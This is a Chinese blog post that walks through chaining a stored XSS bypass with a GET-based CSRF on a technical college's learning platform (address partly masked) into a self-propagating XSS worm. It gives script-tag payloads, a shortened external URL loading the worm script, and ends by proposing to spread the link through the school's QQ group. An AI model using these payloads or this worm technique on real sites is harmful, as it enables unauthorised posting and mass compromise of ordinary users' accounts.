时人不识凌云木,直待凌云始道高。这篇文章主要讲述实战储存XSS+CSRF(XSS绕过到蠕虫)相关的知识,希望能为你提供帮助。
0x00 存储XSS
1) 可绕过的XSS
【实战储存XSS+CSRF(XSS绕过到蠕虫)】给大家分享个漏洞案例,今天上午刚把电脑修好
某技术学院储存XSS+CSRF(XSS绕过滤到蠕虫)
注册处:
??http://xxx.edu.cn/meol/xxxx?
?需要注册才能进入社区发表,先说下储存XSS,过滤了,发现可绕过
储存XSS:
??http://xxx.edu.cn/meol/xxx?genre=80&
type=0?
?
他是先过滤再输出,而不是输出时过滤,从而导致可绕过
文章图片
我们发现他输入时就进行了过滤,直接替换
<
script>
alert(XSS)<
/script>
成功弹框:文章图片
0x01 CSRF配合XSS蠕虫
?同样是这个位置,发表话题,改成get请求
文章图片
文章图片
得到连接:
CSRF:
http://xxx.edu.cn/meol/xxx?type=& studyCircleId=& saytext=%B9%FE%B9%FE
?点击链接会自动发表内容
我们缩短一下链接 网上有在线缩短的,缩短后链接
http://suo.im/abc
构造一下csrf连接:
<
script src=http://suo.im/abc>
<
/script>
(插入到网页当中,当别人访问你的个人中心,会自动发表一个内容)接着我们继续构造,找到CSRF漏洞处,把后面的内容替换为CSRF链接,也就是访问此连接会自动发表内容
http://xxx.edu.cn/meol/xxx?type=0& studyCircleId=& saytext=< script src=http://suo.im/xxx> < /script>
继续缩短网址:
缩短后:?
?http://suo.im/XXXX?
?这个时候我们再调用一下CSRF+XSS的地址:< script src=http://suo.im/XXXX> < /script>
?把这个链接插入到网页当中即可完成XSS蠕虫
当A访问你的主页时,A会发表和你一样的内容,当B访问A的主页时,B会发表和A一样的内容,同理,完成XSS蠕虫
文章图片
最后的思路就是自己构造个网站,加这个学校的QQ群,发送链接哈哈。
推荐阅读
- 玩转Python日志模块(logging)
- Dockerfile 的最佳实践 | Dockerfile 你写的都对么()
- 双区域ASA配置
- Django 用户验证
- Kafka 万亿级消息实践之资源组流量掉零故障排查分析
- 正则表达式 三剑客--awk
- 快速串讲校招高频面试题——排序算法和复杂度
- Mysql数据库故障恢复
- oracle拨云见日第1篇之安装10g